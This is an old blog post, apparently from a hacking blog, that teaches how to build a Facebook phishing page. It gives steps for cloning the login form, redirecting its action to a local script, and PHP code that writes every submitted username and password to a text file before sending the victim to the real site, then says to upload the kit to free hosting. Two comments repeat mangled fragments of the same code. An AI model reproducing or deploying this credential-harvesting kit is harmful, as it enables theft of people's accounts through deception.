20 October 2009

Making a Phisher

Facebook:
1) Go to facebook, and view the source, copy all the text to some code editor or notepad
2) Press Control + F
3) Search for "action"
4) You should find "action=www.facebook.com/login"
5) Delete all the facebook.com stuff, and put: login.php
6) Beside "action" you will see something saying: "method=post"
7) Change "post" to "get"
Save the file, name it "index.php" and save it to desktop
9) Make a new file in some code editor or notepad, and put this code:


header("Location: http://www.facebook.com/login.php ");
$handle = fopen("file.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

10) Now save it as "login.php"

11) Now, make a new file in notepad, dont write anything, save it as "file.txt"

12) now upload all of them to some free hosting and ur ready

IF YOU DONT KNOW WHERE TO UPLOAD THE PHISHER OR YOU DO NOT HAVE A HOST, READ THIS TUTORIAL ALSO:
http://hack4life4.blogspot.com/2009/10/uploading-phisher.html

2 comments:

  1. Dude, it shall be following:

    $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
    in login.php
    Atleast i know php right..

    ReplyDelete
  2. wtf cant say it :S
    $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

    ReplyDelete

hack4life4.hax0r@gmail.com